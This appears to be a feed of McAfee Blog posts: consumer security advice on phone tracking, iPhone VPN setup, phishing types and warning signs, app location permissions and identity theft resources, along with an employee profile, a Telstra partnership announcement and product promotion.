A device that is infected with malware or spyware can track your location even if your location settings are turned off. Malware can also record your online activities, allow cybercriminals to steal personal information, or slow down your operating system. 

To help protect your mobile device, consider getting a comprehensive security tool like McAfee Security for Mobile. It works for both Android and iOS devices and comes with an antivirus app that scans for threats and malware and blocks them in real-time. 

Can you tell if your phone is being tracked?

While many reasons for tracking a phone’s location information are benign — such as seeing where a loved one might be — scammers and hackers may track phones in an attempt to steal personal data.  

Luckily, some telltale signs can help you spot whether your phone is being tracked. 

Battery drain

When your phone has spyware, the program continuously runs in the background and drains your battery. A battery that is losing power faster than normal is either due to an old battery or spyware 

Check your battery health to see if it is still strong. If you use an iPhone, follow these steps to check battery health. You’ll see a maximum capacity score that shows your battery power compared to when it was new. An older phone with a battery capacity of 75% could explain why your battery loses power throughout the day. If your battery capacity is 95% or 100% and it drains quickly, however, a virus could be to blame. 

It’s a slightly different process to check the battery health on an Android device. Depending on the phone brand, you may need to download an app. 

Overheating 

Using apps with high processing demands can cause your mobile device to heat up. A spyware app that tracks your device’s location will use GPS, which causes the phone to work harder and overheat. If you’re using your smartphone normally and it overheats, it could be a sign of malware. 

Extra apps

If there are unfamiliar apps on your phone, someone may have tampered with it. The mystery app could be spyware. 

Unprompted activity

If your phone launches activities that you didn’t initiate, an app might be running in the background. In some cases, malware needs to reboot your phone to install updates or change the phone’s settings.  

A phone that automatically restarts lights up for no reason or makes noises during calls or texts could be infected with malware. 

Phone tracking FAQs 

Here are answers to some common questions about phone tracking. 

Can a phone be tracked if it’s turned off?

A phone that is turned off is difficult to track because it stops sending signals to cell towers. However, the service provider or internet provider can show the last location once it’s switched back on. 

Can a phone be tracked with no cell service/connection?

Even without cell service, Android devices and iPhones can be tracked. Your phone’s mapping apps can track your phone’s location without an internet connection.  

The GPS works in two ways: It uses Assisted GPS or A-GPS when you have a data connection. This uses the locations of cellphone towers and known Wi-Fi networks to figure out where you are. It also uses data from GPS satellites for more precise information. The A-GPS needs data service to work, but the GPS radio can receive satellite information without data service. 

Can a phone be tracked when it’s in airplane mode?

Yes, your phone can be tracked when it’s in airplane mode. While it does turn off Wi-Fi and cellular services, airplane mode doesn’t turn off GPS (a different technology that sends and receives signals from GPS satellites). You’ll have to disable GPS on your device and turn on airplane mode to prevent your phone from being tracked. 

Protect your mobile security with McAfee

Understanding how your phone can be tracked can help you protect your privacy. For greater peace of mind, though, it can help to have a mobile security tool like McAfee Security for Mobile to keep your Android or Apple device free from spyware 

Our all-inclusive mobile security tool safeguards your digital life by offering safe browsing, a secure VPN, and antivirus software. It actively protects you from malicious apps, like spyware, and unwanted visitors.  

With a dedicated mobile security app, you can use your phone the way you want without worrying about cybercriminals tracking your information.  

The post Can My Phone Be Tracked If Location Services Are Off? appeared first on McAfee Blog.

Don’t Stop Learning! Jeremy’s McAfee Journey

By Life at McAfee

Our How I Got Here series spotlights the stories of team members who have successfully grown their careers here at McAfee. This journey features Jeremy whose passion for learning has seen him grow his career in our Technology Services Team.

My McAfee career journey

In 2015, I started as a contract worker to help manage network cabling in McAfee’s buildings. While I was doing that, I was also asked to help manage our voice network (think of this as phones and conference lines) for North and South America. A year after working in both of those roles, I was asked to focus on voice network engineering. After a couple of years, I began training as an engineer for our audio-visual workspace, which helps bring efficiency and centralization to our conference room communications and collaboration tools. And today, I am a Unified Communications Engineer!

My other role within McAfee is Co-President of the McAfee Veterans Community. I absolutely love the community of veterans from around the globe and our community allies. It’s a wonderful group of people who are always willing to serve their local communities. We have hosted inspiring guest speakers, and volunteer events, and continue to hold monthly virtual Coffee Talks and Happy Hours.

A typical day?

I don’t believe that I’ve ever had a typical workday. One moment I’m entering new employees into our systems, and the next I’m providing backend call-center support. I also help run our big Microsoft Teams live events. And, of course, I troubleshoot communications issues as they arise.

I truly enjoy working with the Technology Services team and especially the Voice and Video Team. Being able to collaborate with such wonderful teams is a really rewarding part of my role.

Changing my career

For about a decade in my previous role, I managed a team doing general upkeep in computer systems and I felt really comfortable doing that! I joined McAfee to do a similar role, but shortly afterward I was asked to pivot to more of an engineering role. It was a bit overwhelming at first, but luckily the team I was with was very helpful and supportive of my learning curve. Even though it was out of my comfort zone, I’m so glad I was given the opportunity – it has blessed mine and my family’s life!

​​​​​​​My advice for anyone looking to drive their career forward is

To never stop learning. There is ALWAYS something to learn and someone who can mentor you. I believe that if you are surrounded by smart people (and pay attention), you can’t help but learn and grow! I absolutely love to learn, so this has been one of top of the reasons why I have loved my job since my very first day.

The post Don’t Stop Learning! Jeremy’s McAfee Journey appeared first on McAfee Blog.

How to Set Up a VPN on an iPhone in 2022

By McAfee

A virtual private network (VPN) is a tool that hides your geolocation and protects your privacy while you’re online. It does this by creating an encrypted tunnel from your home network to a VPN provider’s server.  

When you buy an internet plan, your internet service provider (ISP) gives your equipment (like your router and modem) an Internet Protocol (IP) address. Your IP address helps you communicate with the broader internet by letting a website you’re on know where data is coming from and where to send it.  

In other words, your IP address lets online companies know where you are. Most online businesses store IP addresses for data analysis, but cybercriminals can use your IP to track your activity online, steal your personal information, and target you for scams.  

A VPN reroutes your internet through a server address with a different IP than your own. That way, no one online can trace your internet activity back to you. A VPN also encrypts your internet data to protect your personal information.  

VPNs aren’t just for desktop computers, though. All sorts of devices — from iPads to smart TVs — can benefit from a VPN connection. If you’re the type of person who handles your finances or does business online using a mobile device, it’s wise to get a VPN to protect yourself.  

This article will show you how to choose and install a VPN on your iPhone 

Why use a VPN? 

Here are a few of the main ways getting a VPN like McAfee Safe Connect VPN can benefit you:  

  • A VPN can help you remotely access your work intranet. An intranet is a small subsection of the internet that doesn’t connect to the larger internet. Businesses use intranets — where companies may store important internal-only files — to give their employees quick access to company work tools and improve communication.  
  • A VPN uses bank-grade encryption to hide your personal information and actions from cybercriminals and advertisers. This lets you shop, bank, and do everything else online without worrying about someone stealing your information, even if you’re using a public Wi-Fi network. 
  • A VPN can keep your browsing private. It does this by hiding your IP address, so your physical location, banking information, and credit card information are protected while you surf online.  

How to choose a VPN provider

The best VPN for you depends on your situation and what you plan to do online.  

You’ll need a VPN that’s compatible with all of your devices. Many VPNs work with Windows, Android, macOS, Linux, and iOS. However, not all VPNs are compatible with every operating system. For instance, if you have an iPhone but someone else in your home has an Android, it’s important to choose a provider with an app in the Apple App Store and the Google Play Store.  

Consider which features you’ll need:  

  • Will you be traveling? If so, get a VPN with server locations where you’re going.  
  • Do you have a large family with a lot of devices? Then, a router-based VPN can be a good choice.  
  • Will you use your VPN for things like streaming movies on Netflix and gaming? You’ll want a VPN with a lot of speed and bandwidth.  

Be careful when choosing a VPN service, though. Some free VPN services will still pass along your information to ad agencies. If online privacy is your main goal, you’ll want to find a VPN that doesn’t store logs of your internet activity or pass along your data.  

VPN protocols also matter, and they vary in speed and security. For example, Point-to-Point Tunneling Protocol (PPTP) is a fast protocol, but it’s not as secure as other protocols like OpenVPN or Wireguard. Some VPN providers will let you use multiple protocols.  

Finally, look for a VPN that’s easy to use. Some VPNs have convenient features like virtual setup and intuitive interfaces that make using them easier. Some providers will even give you a free trial to test out the VPN before committing to it. Be sure your VPN network also has a reliable support team to help you if you ever have problems. 

How to set up a VPN on an iPhone

We’ll show you how to complete VPN setup on your iPhone in the next few sections.  

Install the iOS app of a VPN provider

Go to the Apple App store on your iPhone and find an app for the VPN provider you’ve chosen. Tap “Get” and “Install” or double-check to install the app on your phone.  

Create an account on the VPN app

Open the VPN app. Create an account with the VPN provider. Sign up for the service.  

Open iPhone settings and connect to the VPN

You’ll have to enter your passcode after creating your account to allow a change in your phone’s VPN settings and enable the VPN.  

You might have to manually configure your VPN if you need access to a private network at a business or school. Here’s how to manually enable a VPN to work on your iPhone 

  1. Tap on your “Settings” app on the Home Screen of your iPhone. 
  2. Choose “General.” 
  3. Press “VPN.” 
  4. Tap “Add VPN Configuration.”  
  5. Press “Type” and pick the type of VPN protocol you’re using. It could be IKEv2, IPSec, or L2TP 
  6. Type in a description, remote ID, and a server for the VPN.  
  7. Type in your username and password.  
  8. Click “Manual” or “Auto” to enable your proxy server (if using one).  
  9. Press “Done.” 

Use the VPN on your iPhone

After you’ve enabled the VPN on your iPhone settings, you’ll have to activate it when you want to use it. Here’s how you can make your VPN active: 

  1. Go to the “Settings” app on your phone.  
  2. Go to “General.”  
  3. Choose “VPN.”  
  4. Tap the status switch on your VPN to turn it on.  

Be sure to turn off your VPN whenever you’re not using it so it doesn’t use up your battery. It’s especially important to turn off your VPN if you’re on a limited plan from your provider.  

Keep your device safe with McAfee Security for Mobile

A VPN is a great tool for keeping your internet connection private. When you install a VPN on your iPhone, you can enjoy the internet from anywhere knowing that your personal information has an extra layer of protection against advertisers and hackers 

Whether you use an Android or an iOS device, though, McAfee can help you stay safe online. With McAfee Security for Mobile, you can access quality security tools like a VPN and safe browsing.  

Our award-winning app allows you to connect safely and seamlessly to the digital world while keeping unwanted visitors from entering your digital space. Enjoy one of our most comprehensive security technologies while living your best life online. 

The post How to Set Up a VPN on an iPhone in 2022 appeared first on McAfee Blog.

What Is Phishing?

By McAfee

So much of our personal and professional lives are online — from online banking to connecting with friends and family to unwinding after a long day with our favorite movies and shows. The internet is a pretty convenient place to be! Unfortunately, it can also be a convenient place for cybercriminals and identity theft. 

One way these scammers may try to take advantage of someone is by trying to convince them to give up their personal information or click on links that download things like malware. They might try to appear as a trustworthy source or someone you personally know. This fake online communication is called “phishing.” 

As we’ve all heard before, knowledge is power. By understanding what phishing is, how it works, and the signs to look for, you can help minimize your risk and get back to enjoying the internet the way it was intended. Here’s what you should know. 

How does phishing work?

You’ve probably heard of the term “phishing,” but maybe you don’t know what it means. Here’s a quick overview of how it works.  

Phishing is a type of cybercrime where scammers send communications that appear to be from trusted sources like a major corporation — basically, they’re trying to play off people’s trust through what is known as social engineering. They might request sensitive information like passwords, banking information, and credit card numbers. Hackers may then use this information to access your credit cards or bank accounts 

The thing with phishing attacks, though, is that they can come through several platforms, including:  

  • Email: This is the most common type of phishing, with 96% of phishing attacks occurring by email. 
  • Phone calls: Scammers might leave messages encouraging targets to call a number where someone will ask for their personal information.  
  • Text messages: The goal is to get people to click links to a malicious website or webpage 
  • Wi-Fi spoofing: Scammers create a malicious free Wi-Fi hotspot that appears to be a legitimate access point. Once connected, they have access to a user’s system. 

What kind of information are phishing scams after?

We’ve mentioned that phishers are looking to get sensitive information, but what exactly are they after? The kind of information phishing scams are after might include:  

  • Login information (including email account and password) 
  • Credit card information 
  • Bank account numbers 
  • Social Security numbers 
  • Company data 

Types of phishing attacks

Phishing scams can come in many forms, but understanding the common types of phishing attacks can help you keep identity thieves at bay. Here are some to be aware of:  

Email phishing

A phishing email is a fraudulent email made to look like it’s from a legitimate company or person. It may ask you to provide personal information or click on a link that downloads malware. For example, an email allegedly from Bank of America notes that due to suspicious activity, you should log into your bank account to verify your information.  

Fortunately, there are ways to spot a phishing cyberattack like this.  

  • There are typos and grammatical errors. If the email is filled with spelling and grammatical errors, it’s likely a phishing scam. Corporations don’t send out emails riddled with errors. 
  • A bank requests personal information. Financial institutions don’t email you to ask for personal information like your PIN, Social Security number, or bank account number. If you receive an email like this, delete it and don’t provide any information. 
  • The URL doesn’t match. To see the sender’s email address, hover over the name of the sender or on the link in the email. If the sender’s address doesn’t match the name that shows, that’s a red flag. For example, if an email that appears to be from FedEx has an email address without the company name in it or if it’s spelled wrong, it’s most likely a phishing email. To check the URL of a link on a mobile phone, press the link and hold it with your finger. 
  • The email isn’t personalized. A company you do business with will address you by name. A phishing email might use a general greeting like “Dear Account Holder.” 
  • There’s a sense of urgency. Phishing messages create fake emergencies to get you to act without thinking. They might claim an account is being frozen unless you immediately confirm your personal details. Requests for emergency action are usually phishing emails. A legitimate business gives its customers a reasonable amount of time to respond before closing an account. 
  • It’s from an unfamiliar sender. Consider deleting an email from a sender you don’t recognize or a business you don’t patronize. Also, be cautious with a message from someone you know who seems unusual or suspicious. 

Spear phishing 

While some phishing emails are sent to a broad audience, spear phishing emails target specific individuals or businesses. This allows the scammers to research the recipient and customize the message to make it look more authentic.  

Examples of spear phishing emails include:  

  • Enterprise hacking: Cybercriminals send emails to employees in a corporation to find vulnerabilities in a corporate network. The emails might appear to be from a trusted source. It only takes one person to click on a link to download ransomware that infects the company’s network.  
  • A note from the boss: An employee receives a fraudulent email that appears to be from an executive asking them to share company information or expedite payment to a vendor. 
  • Social media scam: Cybercriminals can use information from your social media account to request money or data. For example, a grandparent might receive a text using the name of their grandchild asking for money for an emergency. But when they call to check, they find out their grandchild is safe at home. 

One of the best defenses against spear phishing is to contact the source of an email to verify the request. Call the colleague who’s asking you to do a wire transfer or log onto your Amazon account to check for messages. 

Clone phishing

For this highly customized scam, scammers duplicate a legitimate email you might have previously received and add attachments or malicious links to a fake website. The email then claims to be a resend of the original. Clicking a malicious link can give spammers access to your contact list. Your contacts can then receive a fake email that appears to be from you. 

While clone phishing emails look authentic, there are ways to spot them. They include:  

  • Follow up directly. Go to the website of the bank, online retailer, or business to see if you need to take action. 
  • Look at the URL. Only websites that begin with HTTPS should be trusted, never sites that begin with HTTP. 
  • Look for mistakes. As with any phishing email message, be on the lookout for spelling errors and poor grammar. 

Voice phishing

Through vishing or voice phishing, scammers call you and try to persuade you to provide sensitive data. They might use caller ID spoofing to make the call appear to be from a local business or even your own telephone number. Vishing calls are usually robocalls that leave a voicemail or prompt you to push buttons for an operator. The intent is to steal credit card information or personal and financial information to be used in identity theft. 

Fortunately, there are signs that give away these attacks. They include:  

  • The call is from a federal agency. If a caller pretends to be from a federal agency, it’s likely a scam. Unless you’ve requested it, agencies like the IRS won’t call, text, or email you. 
  • It requires urgent action. Scammers might attempt to use fear to make you act quickly. The pressure to act immediately is a giveaway. 
  • They request personal information. It’s a red flag when the caller asks for your information. Sometimes, they’ll have some of your data, even the first few digits of your Social Security number. The scammer will try to make you think the call is legit and get you to provide additional information. 

If you’d like to avoid vishing calls, there are several things you can do. When you don’t recognize the number, don’t answer the phone. Let the call go to voicemail, then block it if it isn’t legitimate. Use a call-blocking app to filter calls coming to your cellphone. To block calls on a landline, check with your service provider regarding the services offered.  

Dealing with a cybercriminal is no time to be polite. If you do answer a vishing call, hang up as soon as you realize it. Don’t answer any questions, even with a yes or no. Your voice could be recorded and used for identity theft. If they ask you to push a button to be removed from a call list, don’t do it. You’ll just receive more calls. 

If you receive a voicemail and are unsure if it’s legitimate, call the company directly using the phone number on the company website. Don’t call the number in the voicemail. 

Smishing

If you’ve ever received a text pretending to be from Amazon or FedEx, you’ve experienced smishing. Scammers use smishing (SMS phishing) messages to get people to click on malicious links with their smartphones. Some examples of common fraudulent text messages include: 

  • Winning prizes: If it seems too good to be true, it probably is. 
  • Fake refunds: A company you do business with will credit your account or credit card, not text you. 
  • Relatives who need help: These messages might request bail money or other assistance for a relative who is abroad. 
  • Messages from government agencies: Always delete these texts because federal agencies don’t conduct business by text message. 
  • Texts from companies like Amazon or Apple: These are the most frequently spoofed businesses because most people do business with one or both of them. 

If you receive a smishing text, don’t respond because it’ll cause you to receive more texts. Instead, delete the text and block the number. 

Pop-up phishing

Pop-up phishing occurs when you’re on a website and a fake pop-up ad appears. It encourages you to click a link or call a number to resolve the issue. Some of these reload repeatedly when you try to close them or freeze your browser.  

Common pop-up scams include:  

  • Infected computer alert: This scam ad tries to persuade you to click a link to remove viruses from your computer. For added urgency, some even include fake countdown clocks that give you a few seconds to click a link and install antivirus software. The link actually installs malware. Legit antivirus software like McAfee® Total Protection won’t do that — instead, keeping your connected life safe from things like malware, phishing, and more. 
  • AppleCare renewal: This pop-up encourages you to call a fake Apple number to give credit card information to extend your Apple warranty. 
  • Email provider pop-ups: You’re encouraged to provide personal data by this pop-up, which appears to come from your email provider. 

If you see a scam pop-up ad, don’t click on the ad or try to click the close button within the ad. Instead, close out of the browser window. If your browser is frozen, use the task manager to close the program on a PC. On a Mac, click the Apple icon and choose Force Quit. 

What should I do if I am a victim of phishing?

Being online makes us visible to a lot of other people, including scammers. Fortunately, there are things you can do if you become a victim of phishing — allowing you to get back to enjoying the digital world. They include: 

  • File an FTC report. Go to IdentityTheft.gov to report phishing and follow the steps provided. 
  • Change your passwords. If you provided the passwords to your bank account or another website, log into your account and change your passwords and login credentials. If you have other accounts with the same passwords, change those too. Don’t use the same passwords for more than one account. 
  • Call the credit card company. If you shared your credit card number, call and let them know. They can see if any fraudulent charges were made, block your current card, and issue a new credit card. 
  • Review your credit report. You can get free copies of your credit report every 12 months from all three major credit agencies — Experian, TransUnion, and Equifax — by going to AnnualCreditReport.com. Check to see if any new accounts were opened in your name. 
  • Scan your devices. There’s a chance you downloaded malware during the phishing attack. Antivirus software, like what’s included in McAfee Total Protection, can scan your devices in real time to detect malicious activity and remove viruses on your devices.  

How can I protect myself from phishing attempts?

You deserve to live online freely. But that might mean taking steps to protect yourself from phishing attempts. Here are some ways you can improve your cybersecurity and keep scammers at bay: 

  • Don’t click email links. If you receive an email from your bank or a company like Amazon, open a browser window and go directly to the company’s site. Don’t click a link in an email. 
  • Use unique passwords. If you use the same password for multiple accounts, a hacker that accesses one of your accounts might be able to break into all of your accounts. Use different passwords for each of your accounts. A password manager like McAfee True Key can help you create and save passwords. 
  • Check your browser security. Web browsers like Google Chrome and Safari can be set to block fraudulent websites. Go into the settings for your browser and adjust the security level. 
  • Use spam filters. All major email providers have spam filters that move suspicious emails into a junk or spam folder. When phishing emails do get to your inbox, always mark them as spam so all other emails from that source will go to the spam folder.  
  • Delete suspicious emails. Delete emails from financial institutions with urgent subject lines, for example. 
  • Use antivirus protection. All of your internet-connected devices should have antivirus protection like McAfee Total Protection. Set it to update automatically to keep your coverage current. 
  • Don’t email information. Banks and credit card companies won’t email you for personal data. If you want to confirm information with a financial institution, contact them directly with the information on their website, such as with a phone number. 
  • Watch your social media posts. Be careful about what you post on social media. Those quizzes where you mention life details, such as your pet’s name, school mascots, and so on, can provide hackers with a wealth of information. Make sure only friends can view your posts. 

Browse online safely and securely

You don’t have to stop enjoying the internet just because of phishing attempts. McAfee’s identity theft protection services, including antivirus software, make it possible to enjoy your digital world while staying safe from scammers and identity thieves.  

With 24/7 active monitoring of your sensitive data, including up to 60 unique types of personal information, McAfee is all about proactive protection. This means you’ll be alerted 10 months sooner than our competitors — so you can take action before your data is used illegally. We also provide up to $1 million of ID theft coverage and hands-on restoration service in the case of a data breach.  

The best part is that you can customize a package to meet your needs, including virus protection, identity theft monitoring, and coverage for multiple devices. We make it safer to surf the net. 

The post What Is Phishing? appeared first on McAfee Blog.

What Types of Apps Track Your Location?

By McAfee

Your mobile phone can do so many things, thanks to the wonders of technology. One of those things is having very accurate information about your location. In fact, some apps have to know your location to work.  

Of course, you can’t expect Google Maps to function as it should without tracking your location. But you’re right to question why a messaging app like WhatsApp needs to know your whereabouts. When it comes to protecting your online privacy, the less information that third parties have about you, the better. 

Keep reading to learn which mobile apps have location tracking and how you can revoke their access. 

How to see which apps are tracking your location 

On an iPhone, apps can track your location, but only after giving them access first. Here’s how to check which apps can monitor your location:  

  1. Open the “Settings” app and click on “Privacy” to see a list of apps that have requested access to your location data. 
  2. Click on “Location Services.” This will show you every app that can request access to your location. You’ll also see if you’ve given any apps permission to track your location. Note that the permission you give to apps to access your location can be at all times or only when you’re using the app.  
  3. To check into a specific app, tap it. You’ll see what permission you’ve granted — the active one will have a checkmark. There are three options: 
  • Never: The app isn’t ever allowed to access your location data. 
  • When using the app: Whenever you open the app and use it, it’ll be able to track your whereabouts. 
  • Always: This means the app can access your location data at all times, whether you’re using it or not. 

If you have an Android device, you can check what permissions you’ve given to the app following these steps:  

  1. Go to “Settings.”  
  2. Then, go to “Apps & Notifications.”  
  3. Select an app, tap “Permissions,” and tap on the triple-dot icon.  
  4. Click on “All Permission” and scroll down to the Location section.  

You’ll see the GPS tracking permissions you’ve granted. The apps you’ve allowed access to your location all the time will be under “Allowed all the time.” The apps that can track you while you’re using them will be under “Allowed only while in use.” And you’ll find the apps you’ve never granted permission under “Not allowed.” 

How to stop apps from tracking your location

Remember that some apps need location data to function properly. For instance, a navigation app like Apple Maps isn’t very useful if it doesn’t know where you are. 

But whenever you want to turn off location tracking for particular apps, you can simply cancel their access. 

If you have an iOS device, follow these steps:  

  1. Open “Settings.”  
  2. Tap “Privacy” and click on “Location Services.”  
  3. Next, tap the app you want to change the location setting for.  
  4. Then, select the option you want, like “Always,” “While using,” or “Never.” 

To change the location setting for apps on an Android phone:  

  1. Tap on “Settings.”  
  2. Then, tap on “Apps & Notifications.”  
  3. Pick an app and tap on “Permissions.”  
  4. Switch “Location” to on or off. 

Common types of apps with location tracking

There are many reasons apps need to know your location history, such as personalizing your app experience. Not to mention that location tracking apps like Find My iPhone and family location-sharing apps like Life360 are very helpful for family members to keep track of their loved one’s location.  

But simply speaking, the main reason apps track your location is because it’s profitable. Your information is sold to marketers, making it easier to show you ads you should be interested in.   

This is why it’s always a good idea to check what apps access your location information. So, check them regularly, following the steps laid out above.  

Common apps to watch for location tracking include: 

Map apps

Of course, navigation apps need to know your current location so that they can direct you to where you want to go. Getting access to your real-time location allows them to give you turn-by-turn directions. The apps also use a GPS tracker to help you find establishments like restaurants or gas stations nearby.  

Ride-hailing apps

Ride-hailing apps like Uber and Lyft use your GPS location to let drivers know where to pick you up. Be careful about ride-hailing apps, though, because their tracking features are made to monitor your movement in the background. This means they can access your location all the time, even when the apps aren’t active.  

So, if you’re not a regular ride-hail user, check these phone tracking apps when you’re not using them and turn off the location settings until you need them again. 

Social media

Like most free apps, social media apps collect personal and location data so they can learn who you are. And everything they know about you is used for advertising purposes. This is why you might get “find my friends” suggestions and ads about cafes, stores, and everything else that’s available in your area.  

Something to be aware of is that the ways social media apps like Facebook ask for permission to access your location data aren’t always straightforward. For instance, if you’re posting a photo, the app will ask you to “Turn on Location Services” to add a geo-tag. And if you do, they’ve got the green light to track your whereabouts.  

News and weather apps

When you check the news and weather forecast by using an app, the app asks for your location to provide you with information based on where you are.  

Giving these apps your location can help with the user experience since you won’t have to search for local news or weather updates. But not giving the apps access to your phone location doesn’t affect how they operate.  

Coupon apps

Coupon apps like Flipp want as much information from you as possible to personalize your experience. Location sharing helps these apps provide you with the closest stores to shop and ongoing sales near you. 

In the case of coupon apps, geofencing helps in their marketing quite a lot. With geofencing, apps use radio frequency identification (RFID), Wi-Fi, and GPS location to send ads at exactly the right moment to a target device. The ad can be sent as an SMS, email, or app notification when a cellphone enters or leaves a geofence.  

An example would be a text message that says, “Today only! Spend $50 and get the item of the day for $0.99!” when a customer enters a grocery store.  

Streaming apps

Streaming apps like Netflix and Spotify may ask for your location so that you don’t get access to geo-restricted content. For instance, live streaming TV apps need your location to confirm regional blackouts and other features. But other than that, they don’t necessarily need to monitor your location to work. 

Insurance apps

Car insurance companies have found a way to use technology by offering discounts to clients who allow them to collect personal information and share location data. Some of the information they want include your phone use while driving, how fast you drive, or how sharply you brake. Insurance companies claim that their phone tracker apps collect data to reward good behavior and avoid accidents. 

See how McAfee Security for Mobile keeps your device safe

Our mobile phones are one of our most valuable possessions because we rely on them to get us through the day. That’s why it’s important to understand how information about you and your activities is used, shared, and sold.  

 

The good news is that you can protect your digital life with McAfee Mobile Security, which allows you to connect safely and seamlessly to the digital world with a virtual private network (VPN). You’ll also have access to an antivirus app that regularly scans for online threats like malware.  

 

This means you can use public hotspots, make bank transactions, and surf the web in a safe space. McAfee helps protect your credentials and personal information so that you can continue to enjoy the internet your way.  

The post What Types of Apps Track Your Location? appeared first on McAfee Blog.

5 Ways to Get Victim Assistance for Identity Theft

By McAfee

The internet makes a lot of things in life easier. You can shop, pay your bills, and even book your next getaway. Unfortunately, the internet is also home to some less-than-savory characters who are looking to take sensitive information for personal gain. 

Private information like credit card numbers, driver’s license numbers, phone numbers, and Social Security numbers (SSN) can fall into the wrong hands — leading to identity thieves opening new accounts, taking out loans, and even filing tax returns in their victims’ names.  

Fortunately, victims of identity theft and concerned individuals can access several helpful resources designed to respond to or prevent identity theft through the Federal Trade Commission (FTC), such as IdentityTheft.gov. McAfee Identity Protection can also keep personal information secure with 24/7 monitoring and restoration support.  

This article will explain some common types of identity theft and the resources you can turn to in case identity theft becomes an issue for you.  

What are the most common types of identity theft?

The internet is the place to be if you’re looking to shop, connect with others, and get access to all the information you could ever need. Obviously, we spend a lot of time online, and cybercriminals know that.  

The good news is that a little information can go a long way in protecting your sensitive data. Some common types of identity theft include:  

  • Financial identity theft: Criminals can use your personal information for their financial gain. They might use personal bank funds or credit cards to make purchases or open a new line of credit in your name and leave you with the bill.  
  • Criminal identity theft: Some criminals will go to great lengths to avoid arrest. Fraudsters can give a different name and show a stolen ID to get a clean getaway. This can leave you with a false criminal report in your name.  
  • Medical identity theft: Medical identity thieves pose as someone else and can access medical services, like surgeries, or get prescription drugs and other medical devices and supplies. This can affect your health insurance coverage and make access to health care difficult.  
  • Child identity theft: This type of offender commits financial fraud with a minor’s personal information, such as their SSN. With this information, an identity thief can apply for government benefits, get a driver’s license, and even buy a house.  
  • Synthetic identity theft: Identified as the fastest-growing financial crime, criminals create an identity persona from real information and create a completely new and fake credit file.  

If you have any reason to believe your identity has been stolen, it’s important to report identity theft or suspicious activity to local police, financial institutions, and credit card companies as quickly as possible. You’ll also want to get a copy of your credit reports from each of the major credit bureaus by visiting annualcreditreport.com and routinely check all of your bank statements. 

5 ways to get identity theft victim assistance

Identity theft can be scary, but several resources exist to help victims. Some key ID theft resources include the IRS, IdentityTheft.gov, IDtheftcenter.org, Fraud.org, and McAfee Total Protection.  

IRS Identity Theft Victim Assistance

The Internal Revenue Service (IRS) can help with tax-related identity theft. Tax-related identity theft victims may self-report or receive a notice or letter from the IRS about a suspiciously filed tax return. Signs of tax-related ID theft include receiving a tax transcript you didn’t ask for, getting a report of unknown wages or other income, or not being able to e-file because of a matching SSN.  

Whether you report identity theft or suspicious activity to the IRS or they tell you, you’ll want to follow instructions to resolve any fraudulent tax issues. You may need to verify your identity with Letter 4883C or complete an Identity Theft Affidavit (Form 14039).  

Once everything has been settled, the IRS will tag your account with an identity theft indicator for added protection in the future. In some circumstances, you may even receive an Identity Protection Pin (IP PIN) to use when filing an electronic or paper tax return.  

IdentityTheft.gov

IdentityTheft.gov is a federal resource that can help victims recover from identity theft. The site provides an overview of victim rights, sample letters you can use to dispute any fraudulent credit or debit card charges, and a checklist to track your progress.  

IdentityTheft.gov can help with any identity theft, including that related to student loans and fraudulent unemployment insurance claims. You’ll need to explain your situation in great detail to receive a personalized recovery plan.  

IDtheftcenter.org

The Identity Theft Resource Center (ITRC) helps prevent, recover, and protect individuals and businesses from identity theft. This nonprofit organization provides information and assistance at no cost and can help with account takeovers, data breaches, email scams, and other fraudulent account activities. You can also sign up for ID Theft News and stay informed with newsletters and alerts.  

Identity theft victims can use the online chat or call to speak with an adviser who can help figure out the next steps to take. They may suggest filing a police report, placing a credit freeze, and/or obtaining free credit report copies from the major credit bureaus, like Experian, TransUnion, and Equifax.  

Fraud.org

A project of the National Consumers League, Fraud.org collects and shares decades worth of consumer complaints related to fraud. With advocacy, education, and consumer counseling, Fraud.org helps consumers protect themselves from telemarketing and internet fraud.  

Fraud.org raises awareness about many types of common and unexpected scams, including phony sweepstakes prizes, government grants and scholarships, online phishing for financial account numbers and other personal information, malware downloads, and the possibility of a financially disastrous ending after falling in love online.  

You can sign up for fraud alerts or file a complaint on the secure website and Fraud.org will share your story with their network of law enforcement agencies.  

McAfee Total Protection

Identity protection with McAfee Total Protection Ultimate provides around-the-clock email address and bank account monitoring, which includes $1 million of ID theft coverage on qualifying losses. As a subscriber, you’ll also gain access to hands-on restoration support to help with reclaiming your identity.  

McAfee Total Protection can go wherever you go. Stay in the know on your tablet, laptop, or smartphone and receive critical alerts. The software also provides a Protection Score that can help you secure any weak areas that may leave you open to ID theft.  

See how McAfee Identity Protection keeps you safe

Use the internet your way and protect your sensitive information with 24/7 account monitoring and alerts. McAfee Total Protection adds an additional layer of security by keeping tabs on up to 60 unique types of personal information. We’ll also guide you through the best choices for prevention and alert you as soon as action is needed.  

Get protection from data breaches and malicious software like viruses and malware and benefit from fraud alerts 10 months sooner than our competitors. Get the peace of mind that comes with knowing that McAfee is looking out for you and keeping your identity safe. 

The post 5 Ways to Get Victim Assistance for Identity Theft appeared first on McAfee Blog.

McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers

By McAfee

McAfee announces a partnership that will grant new and existing Telstra customers easy access to McAfee’s leading security solutions to deliver holistic security and privacy protection through its integrated suite of services including Antivirus, Parental Controls, Identity Protection, Secure VPN and more, to protect and secure multiple devices including mobiles, PCs and laptops. The partnership brings added protection to Telstra’s millions of customers and their devices via McAfee’s intuitive and integrated consumer security platform 

“A recent McAfee study found 27% of Australians surveyed reported attempted account theft and 23% had experienced financial account information leaks,” said Pedro Gutierrez, Senior Vice President of Global Sales and Operations at McAfee. “As the proliferation of life online accelerates, we are thrilled to be partnering with Telstra who are showing through this collaboration, a commitment to innovation and to their customers by investing in new infrastructure and technologies that safeguard their mobile and broadband subscribers. 

McAfee’s integrated consumer security platform offers a wide array of mobile security solutions to protect customers’ privacy and identity while blocking viruses, malware, spyware, and ransomware attacks. This partnership allows Telstra’s customers to take advantage of these capabilities and protect themselves from additional threats including potential hacks, identity theft and broader gaps in online and mobile security so they can live life confidently online.   

“In today’s increasingly connected world the risk of cyber threats continues to grow. To counter the risk, Telstra is committed to providing our customers with the safety and security features needed to protect them online,” said Matthew O’Brien, Cyber Security Executive and Group Owner at Telstra. “This partnership with McAfee helps drive our mission to build a safe and secure connected future where everyone can thrive, and further complements Telstra’s T25 ambition to extend our network leadership position by delivering greater value to our customers.”  

